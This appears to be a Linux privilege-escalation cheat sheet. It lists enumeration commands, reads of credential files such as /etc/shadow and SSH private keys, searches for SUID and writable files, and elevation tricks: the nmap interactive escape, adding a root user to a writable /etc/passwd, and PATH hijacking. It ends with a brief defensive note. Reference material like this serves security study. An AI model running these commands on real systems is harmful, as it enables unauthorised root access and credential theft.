Reuseful escalation patterns¶

Shell¶

Upgrade to bash:

python -c 'import pty; pty.spawn("/bin/bash")'

Host Information¶

Get OS version, patches, etc.:

/bin/uname -a
/usr/bin/lsb_release -a
/bin/cat /etc/*-release

User Information¶

Get current user:

/usr/bin/whoami
/usr/bin/id

Get user command history:

/bin/cat /home/$(whoami)/.bash_history
/bin/cat /home/$(whoami)/.nano_history
/bin/cat /home/$(whoami)/.vim_history
/bin/cat /home/$(whoami)/.atftp_history
/bin/cat /home/$(whoami)/.mysql_history
/bin/cat /home/$(whoami)/.php_history

Get environment variables and PATH:

set
/bin/echo $PATH

Reset $PATH and environment variables:

set -a
source /etc/environment
. ~/
set +a

List users:

/bin/cat /etc/passwd
/bin/cat /etc/group
/bin/cat /etc/sudoers

Attempt to list hashed passwords:

/bin/cat /etc/shadow

Current logon and last logon:

/usr/bin/w
/usr/bin/last

SSH information:

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

Services¶

Current processes:

/bin/ps -ef | /bin/grep root
/bin/ps -ef | /bin/grep $(whoami)
/bin/netstat -at
/bin/netstat -atnl
/bin/ss

Tasks¶

List cron jobs:

/usr/bin/crontab -l
/bin/ls -alh /var/spool/cron
/bin/ls -al /etc/ | grep cron
/bin/ls -al /etc/cron*
/bin/cat /etc/cron*
/bin/cat /etc/at.allow
/bin/cat /etc/at.deny
/bin/cat /etc/cron.allow
/bin/cat /etc/cron.deny

Network¶

List network configuration:

/sbin/ifconfig
/sbin/iwconfig
/sbin/ip a
/bin/cat /etc/network/interfaces
/bin/cat /etc/sysconfig/network
/bin/cat /etc/resolv.conf
/bin/cat /etc/sysconfig/network
/bin/cat /etc/networks
/sbin/ifconfig -aiptables -L
/bin/hostname
/bin/dnsdomainname

Programs and Binaries¶

Search for installed programs or binaries:

/bin/ls -lha /bin
/bin/ls -lha /usr/bin
/bin/ls -lha /opt/
/bin/ls -lha /sbin/
/bin/ls -lha /var/cache/apt/archivesO
/bin/ls -lha /var/cache/yum/*
dpkg -l
rpm -qa

Weak Permissions¶

SUID/SGID, RWX, Current User:

/usr/bin/find / -type f -perm 0777 2>/dev/null
/usr/bin/find / -user $(whoami) 2>/dev/null
/bin/ls -ahlR /home/ 
/bin/ls -ahlR /root/ 

Files from specific group:

find / -group <group> 2>/dev/null

Find writable files (newer systems):

/usr/bin/find / -perm /6000 2> /dev/null
/usr/bin/find / -perm /4000 2> /dev/null
/usr/bin/find / -perm -g=s -o -perm /4000 ! -type l -maxdepth 3 -exec /bin/ls -ld {} \; 2>/dev/null
/usr/bin/find / -perm /222 -type d 2>/dev/null

Find writable files (older systems):

/usr/bin/find / -perm +6000 2> /dev/null
/usr/bin/find / -perm +4000 2> /dev/null
/usr/bin/find / -perm -g=s -o -perm +4000 ! -type l -maxdepth 3 -exec /bin/ls -ld {} \; 2>/dev/null
/usr/bin/find / -perm -222 -type d 2>/dev/null

Sudo Permissions¶

Attempt sudo:

/usr/bin/sudo su -

See if anything can run with sudo:

/usr/bin/sudo -l

Mail¶

Find mail files:

/bin/cat /var/mail/root
/bin/cat /var/mail/${whoami}
/bin/cat /var/spool/mail/root
/bin/cat /var/spool/mail/${whoami}

File System¶

Mounted drives:

/bin/df -lh
/bin/cat /etc/fstab
/bin/mount | column -t

Files¶

Search for potentially sensitive files:

/usr/bin/find / -type f -name "*.txt" 2> /dev/null
/usr/bin/find / -type f -name "*.log" 2> /dev/null
/usr/bin/find / -type f -name "*.sh" 2> /dev/null
/usr/bin/find / -type f -name "*.rar" 2> /dev/null
/usr/bin/find / -type f -name "*.zip" 2> /dev/null
/usr/bin/find / -type f -name "*.tar" 2> /dev/null
/usr/bin/find / -type f -name "*.gz" 2> /dev/null
/usr/bin/find / -type f -name "*.pdf" 2> /dev/null
/usr/bin/find / -type f -name "*.xls" 2> /dev/null
/usr/bin/find / -type f -name "*.xlsx" 2> /dev/null
/usr/bin/find / -type f -name "*.xml" 2> /dev/null
/usr/bin/find / -type f -name "*server.xml" 2> /dev/null
/usr/bin/find / -name *name* 2> /dev/null
/usr/bin/find / -type f -iname ".*" -ls 2> /dev/null
/usr/bin/find -maxdepth 2 -type f -ls -exec file -b {} \;

Elevations¶

If the user can sudo with nmap:

sudo nmap --interactive

Then escape:

!sh

If /etc/passwd is writable:

openssl passwd -1 -salt <user> <password>

Then run above output with:

echo "<user>:<output>:0:0:root:/root:/bin/bash" >> /etc/passwd

If a SUID file has relative instead of absolute path (example if binary backup runs cat /etc/shadow then make a file called cat:

echo "<exploit-code" > cat
chmod +x cat

Then update PATH and run:

export PATH=~/:$PATH
./backup

Counter moves¶

These patterns chain small Linux misconfigurations into root. Least privilege and configuration auditing remove most of them at the source. The defender’s view is in the blue notes on the gap between access and authority.